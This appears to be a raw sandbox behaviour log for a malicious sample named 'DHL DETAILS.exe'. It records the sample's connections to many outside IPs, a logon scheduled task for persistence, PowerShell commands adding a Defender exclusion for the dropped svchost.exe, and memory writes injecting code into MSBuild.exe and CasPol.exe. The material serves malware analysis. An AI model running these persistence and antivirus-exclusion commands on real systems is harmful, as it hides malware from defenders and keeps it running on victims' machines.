                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.117.109.5 4153
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 159.65.39.234 7732
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 110.164.175.110 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.223.246.226 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 202.162.219.10 1080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 198.101.13.111 25543
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 66.70.197.196 8050
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 104.21.85.109 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 172.67.181.197 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 202.144.134.150 5678
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 155.185.15.56 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 154.205.152.96 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 5.78.44.6 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 91.222.198.125 5678
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 94.131.63.120 58378
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 54.36.122.16 29796
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 202.159.19.213 443
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 47.111.179.60 8877
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 86.110.189.118 42539
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 201.168.8.74 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 162.241.50.179 40179
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 142.54.228.193 4145
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 178.207.8.20 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.207.199.87 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 20.169.221.14 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 47.94.83.254 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 27.123.3.141 4145
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 43.157.50.206 443
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 45.249.78.25 83
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 200.108.197.2 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 177.8.113.61 50297
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 27.112.70.59 1111
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 201.182.251.142 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 165.227.196.37 63637
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 3.9.71.167 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 194.163.159.94 35081
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 51.158.124.167 16379
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 185.118.153.110 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.217.226.43 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 125.25.40.38 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.217.226.44 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 51.15.133.214 16379
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 88.255.102.114 1082
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.217.226.45 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.125.240.237 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 45.12.31.3 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 202.159.60.65 443
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.169.254.185 2068
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 47.57.115.226 9050
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 204.48.31.203 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 37.187.141.160 2604
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 162.19.7.53 17979
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 201.251.155.253 5678
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 51.81.186.179 58630
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.35.111.101 4145
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 52.13.248.29 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 155.50.209.50 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 2.229.249.153 4145
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 115.127.2.230 5678
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 18.135.211.182 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 111.224.11.180 8089
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.174.145.12 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 176.8.230.197 8187
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 35.182.11.156 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 104.17.16.87 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 51.158.72.165 16379
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 170.82.231.253 4153
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 213.151.79.84 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 173.212.240.168 46664
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 51.210.127.15 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 113.252.44.133 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.174.145.11 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.85.103.129 5678
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 31.7.65.18 443
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 162.19.7.61 49319
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.217.226.40 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.217.226.42 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 170.239.207.241 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 88.210.20.144 20000
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 201.157.254.26 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 195.138.73.54 44017
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 200.54.22.74 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 51.250.13.88 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 65.1.40.47 1080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 47.243.205.1 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 218.145.131.182 443
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 43.228.213.24 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43E000
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 440000
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: E58008
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43E000
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 440000
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: C87008
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 43E000
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 440000
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 687008
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exitJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp5A0E.tmp.bat""Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3 Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 43312 -ip 43312
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 43312 -s 155960
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 484 -p 56176 -ip 56176
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 56176 -s 44056
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 544 -p 43080 -ip 43080
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 43080 -s 96472
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                Source: C:\Users\user\Desktop\DHL DETAILS.exeQueries volume information: C:\Users\user\Desktop\DHL DETAILS.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exeQueries volume information: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Framework\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exeQueries volume information: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Framework\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
